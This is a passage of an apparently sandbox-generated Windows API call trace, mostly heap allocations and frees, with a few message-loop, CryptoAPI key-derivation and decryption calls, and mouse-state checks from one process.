Size=0x20) returned 0xf20680 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed9250 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33928 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb7d0 [0274.603] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb5a8 [0274.604] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf338c8 [0274.604] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb5a8 | out: hHeap=0xcc0000) returned 1 [0274.604] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338c8 | out: hHeap=0xcc0000) returned 1 [0274.604] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf206a8 [0274.604] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb5a8 [0274.604] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338c8 [0274.604] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb788 [0274.604] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb7a0 [0274.604] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf338d8 [0274.604] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb7a0 | out: hHeap=0xcc0000) returned 1 [0274.604] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338d8 | out: hHeap=0xcc0000) returned 1 [0274.604] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf206d0 [0274.604] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb7a0 [0274.604] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338d8 [0274.604] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb7a0 | out: hHeap=0xcc0000) returned 1 [0274.604] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf206f8 [0274.604] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb7a0 [0274.604] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb5f0 [0274.604] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf338e8 [0274.604] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb5f0 | out: hHeap=0xcc0000) returned 1 [0274.604] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338e8 | out: hHeap=0xcc0000) returned 1 [0274.604] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20720 [0274.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb5f0 [0274.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338e8 [0274.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed90a0 [0274.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb620 [0274.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf338f8 [0274.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb620 | out: hHeap=0xcc0000) returned 1 [0274.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338f8 | out: hHeap=0xcc0000) returned 1 [0274.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20748 [0274.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb620 [0274.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338f8 [0274.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb620 | out: hHeap=0xcc0000) returned 1 [0274.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20770 [0274.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb620 [0274.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed90d0 [0274.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33908 [0274.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xcc0000) returned 1 [0274.605] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33908 | out: hHeap=0xcc0000) returned 1 [0274.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20798 [0274.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed90d0 [0274.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33908 [0274.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb608 [0274.605] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb650 [0274.606] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf338a8 [0274.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb650 | out: hHeap=0xcc0000) returned 1 [0274.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338a8 | out: hHeap=0xcc0000) returned 1 [0274.606] PeekMessageW (in: lpMsg=0x8df37c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df37c) returned 0 [0274.606] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338a8 [0274.606] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf207c0 [0274.606] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0274.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf207c0 | out: hHeap=0xcc0000) returned 1 [0274.606] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338a8 | out: hHeap=0xcc0000) returned 1 [0274.606] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb650 [0274.606] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xee48f0 [0274.606] PeekMessageW (in: lpMsg=0x8df124, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df124) returned 0 [0274.606] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf338a8 [0274.607] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33918 [0274.607] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf51e80 [0274.607] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0274.607] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51e80 | out: hHeap=0xcc0000) returned 1 [0274.607] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33918 | out: hHeap=0xcc0000) returned 1 [0274.607] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xed9100 [0274.607] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xee4938 [0274.607] PeekMessageW (in: lpMsg=0x8ded04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ded04) returned 0 [0274.607] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33918 [0274.607] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf338b8 [0274.607] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338b8 | out: hHeap=0xcc0000) returned 1 [0274.607] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33918 | out: hHeap=0xcc0000) returned 1 [0274.607] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee4938 | out: hHeap=0xcc0000) returned 1 [0274.607] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9100 | out: hHeap=0xcc0000) returned 1 [0274.607] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33918 [0274.607] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xf23848 [0274.607] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf23848 | out: hHeap=0xcc0000) returned 1 [0274.607] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33918 | out: hHeap=0xcc0000) returned 1 [0274.607] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338a8 | out: hHeap=0xcc0000) returned 1 [0274.607] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40f00 [0274.607] PeekMessageW (in: lpMsg=0x8df124, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df124) returned 0 [0274.607] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40f00 | out: hHeap=0xcc0000) returned 1 [0274.608] PeekMessageW (in: lpMsg=0x8df124, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df124) returned 0 [0274.608] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338a8 [0274.608] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf51e80 [0274.608] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0274.608] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51e80 | out: hHeap=0xcc0000) returned 1 [0274.608] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338a8 | out: hHeap=0xcc0000) returned 1 [0274.608] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xed9100 [0274.608] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xee4938 [0274.608] PeekMessageW (in: lpMsg=0x8deecc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8deecc) returned 0 [0274.608] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf338a8 [0274.608] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338a8 | out: hHeap=0xcc0000) returned 1 [0274.609] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf338a8 [0274.609] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338a8 | out: hHeap=0xcc0000) returned 1 [0274.609] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf338a8 [0274.609] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338a8 | out: hHeap=0xcc0000) returned 1 [0274.609] PeekMessageW (in: lpMsg=0x8deecc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8deecc) returned 0 [0274.609] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee4938 | out: hHeap=0xcc0000) returned 1 [0274.609] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9100 | out: hHeap=0xcc0000) returned 1 [0274.609] PeekMessageW (in: lpMsg=0x8df124, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df124) returned 0 [0274.609] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf338a8 [0274.609] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338a8 | out: hHeap=0xcc0000) returned 1 [0274.609] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee48f0 | out: hHeap=0xcc0000) returned 1 [0274.609] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb650 | out: hHeap=0xcc0000) returned 1 [0274.609] PeekMessageW (in: lpMsg=0x8df37c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df37c) returned 0 [0274.609] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40f00 [0274.609] PeekMessageW (in: lpMsg=0x8df37c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df37c) returned 0 [0274.609] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf338a8 [0274.609] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf207c0 [0274.609] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb650 [0274.609] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33918 [0274.609] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338b8 [0274.610] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf51e80 [0274.610] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0274.610] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51e80 | out: hHeap=0xcc0000) returned 1 [0274.610] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338b8 | out: hHeap=0xcc0000) returned 1 [0274.610] CryptCreateHash (in: hProv=0xd27108, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8ded48 | out: phHash=0x8ded48) returned 1 [0274.611] CryptHashData (hHash=0xf40f40, pbData=0xedb530, dwDataLen=0xd, dwFlags=0x1) returned 1 [0274.611] CryptDeriveKey (in: hProv=0xd27108, Algid=0x660e, hBaseData=0xf40f40, dwFlags=0x1, phKey=0x8ded48 | out: phKey=0x8ded48*=0xf40f80) returned 1 [0274.611] CryptDestroyHash (hHash=0xf40f40) returned 1 [0274.613] CryptGetKeyParam (in: hKey=0xf40f80, dwParam=0x7, pbData=0xf33878, pdwDataLen=0x8de830, dwFlags=0x0 | out: pbData=0xf33878*=0x660e, pdwDataLen=0x8de830*=0x4) returned 1 [0274.614] CryptDecrypt (in: hKey=0xf40f80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xf54ea8, pdwDataLen=0x8ded60 | out: pbData=0xf54ea8, pdwDataLen=0x8ded60) returned 0 [0274.616] CryptDestroyKey (hKey=0xf40f80) returned 1 [0274.616] CryptReleaseContext (hProv=0xd27108, dwFlags=0x0) returned 1 [0274.616] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33888 [0274.616] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x214) returned 0xd07380 [0274.616] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb5a8 [0274.616] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb4b8 [0274.616] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb518 [0274.617] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb7a0 [0274.617] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338d8 [0274.617] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb7a0 | out: hHeap=0xcc0000) returned 1 [0274.617] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338d8 | out: hHeap=0xcc0000) returned 1 [0274.617] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb518 | out: hHeap=0xcc0000) returned 1 [0274.617] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb518 [0274.617] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb7a0 [0274.617] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb638 [0274.617] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338d8 [0274.617] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb638 | out: hHeap=0xcc0000) returned 1 [0274.617] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338d8 | out: hHeap=0xcc0000) returned 1 [0274.617] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb7a0 | out: hHeap=0xcc0000) returned 1 [0274.617] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb7a0 [0274.617] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb638 [0274.617] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb410 [0274.617] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf338d8 [0274.617] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb410 | out: hHeap=0xcc0000) returned 1 [0274.617] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf338d8 | out: hHeap=0xcc0000) returned 1 [0274.618] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb638 | out: hHeap=0xcc0000) returned 1 [0274.618] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf337e8 | out: hHeap=0xcc0000) returned 1 [0274.618] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf337a8 | out: hHeap=0xcc0000) returned 1 [0274.618] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20888 | out: hHeap=0xcc0000) returned 1 [0274.618] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb3f8 | out: hHeap=0xcc0000) returned 1 [0274.618] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33938 | out: hHeap=0xcc0000) returned 1 [0274.618] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb6f8 | out: hHeap=0xcc0000) returned 1 [0274.618] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb488 | out: hHeap=0xcc0000) returned 1 [0274.618] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb5f0 | out: hHeap=0xcc0000) returned 1 [0274.618] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9490 | out: hHeap=0xcc0000) returned 1 [0274.619] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed8f80 | out: hHeap=0xcc0000) returned 1 [0274.620] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb608 | out: hHeap=0xcc0000) returned 1 [0274.620] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9040 | out: hHeap=0xcc0000) returned 1 [0274.620] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed9070 | out: hHeap=0xcc0000) returned 1 [0274.620] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed90a0 | out: hHeap=0xcc0000) returned 1 [0274.620] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb848 | out: hHeap=0xcc0000) returned 1 [0274.620] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed8fb0 | out: hHeap=0xcc0000) returned 1 [0274.620] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20568 | out: hHeap=0xcc0000) returned 1 [0274.620] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb4b8 | out: hHeap=0xcc0000) returned 1 [0274.620] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb518 | out: hHeap=0xcc0000) returned 1 [0274.620] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb7a0 | out: hHeap=0xcc0000) returned 1 [0274.620] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb5a8 | out: hHeap=0xcc0000) returned 1 [0274.620] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xd07380 | out: hHeap=0xcc0000) returned 1 [0274.620] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33888 | out: hHeap=0xcc0000) returned 1 [0274.620] PeekMessageW (in: lpMsg=0x8df654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df654) returned 1 [0274.620] TranslateAcceleratorW (hWnd=0xc0170, hAccTable=0x1b016b, lpMsg=0x8df654) returned 0 [0274.620] TranslateMessage (lpMsg=0x8df654) returned 0 [0274.620] DispatchMessageW (lpMsg=0x8df654) returned 0x0 [0274.620] GetForegroundWindow () returned 0xc0170 [0274.620] GetWindowLongW (hWnd=0xc0170, nIndex=-21) returned 0 [0274.620] GetCursorPos (in: lpPoint=0x8df490 | out: lpPoint=0x8df490*(x=881, y=501)) returned 1 [0274.620] ScreenToClient (in: hWnd=0xc0170, lpPoint=0x8df490 | out: lpPoint=0x8df490) returned 1 [0274.620] GetAsyncKeyState (vKey=1) returned 0 [0274.621] GetAsyncKeyState (vKey=2) returned 0 [0274.621] PeekMessageW (in: lpMsg=0x8df654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df654) returned 0 [0274.621] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20568 [0274.621] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb5a8 [0274.621] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33888 [0274.621] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33938 [0274.621] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x30) returned 0xf51eb8 [0274.621] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0274.621] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf51eb8 | out: hHeap=0xcc0000) returned 1 [0274.621] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33938 | out: hHeap=0xcc0000) returned 1 [0274.621] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb7a0 [0274.621] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x40) returned 0xee48f0 [0274.621] PeekMessageW (in: lpMsg=0x8df224, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df224) returned 0 [0274.621] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33938 [0274.621] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf337a8 [0274.621] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf337a8 | out: hHeap=0xcc0000) returned 1 [0274.621] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33938 | out: hHeap=0xcc0000) returned 1 [0274.621] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee48f0 | out: hHeap=0xcc0000) returned 1 [0274.621] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb7a0 | out: hHeap=0xcc0000) returned 1 [0274.621] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33888 | out: hHeap=0xcc0000) returned 1 [0274.621] FreeLibrary (hLibModule=0x74f20000) returned 1 [0274.622] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb5a8 | out: hHeap=0xcc0000) returned 1 [0274.622] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf20568 | out: hHeap=0xcc0000) returned 1 [0274.622] PeekMessageW (in: lpMsg=0x8df654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df654) returned 0 [0274.622] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40f80 | out: hHeap=0xcc0000) returned 1 [0274.622] PeekMessageW (in: lpMsg=0x8df654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df654) returned 0 [0274.622] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xee48a8 | out: hHeap=0xcc0000) returned 1 [0274.622] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb620 | out: hHeap=0xcc0000) returned 1 [0274.622] PeekMessageW (in: lpMsg=0x8df8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8df8ac) returned 0 [0274.622] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33888 [0274.622] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33938 [0274.622] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf337a8 [0274.622] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x18) returned 0xf23868 [0274.622] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf337a8 | out: hHeap=0xcc0000) returned 1 [0274.622] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf23868 | out: hHeap=0xcc0000) returned 1 [0274.623] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33938 | out: hHeap=0xcc0000) returned 1 [0274.623] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33888 | out: hHeap=0xcc0000) returned 1 [0274.623] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20568 [0274.623] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb620 [0274.623] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb5a8 [0274.623] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb7a0 [0274.624] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb518 [0274.624] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xedb4b8 [0274.624] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0xc) returned 0xed8fb0 [0274.624] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x20) returned 0xf20888 [0274.624] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xedb848 [0274.624] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33888 [0274.624] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33888 | out: hHeap=0xcc0000) returned 1 [0274.624] CloseHandle (hObject=0x610) returned 1 [0274.624] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed91f0 | out: hHeap=0xcc0000) returned 1 [0274.624] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33988 | out: hHeap=0xcc0000) returned 1 [0274.624] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf61de8 | out: hHeap=0xcc0000) returned 1 [0274.624] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e80 | out: hHeap=0xcc0000) returned 1 [0274.624] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xedb560 | out: 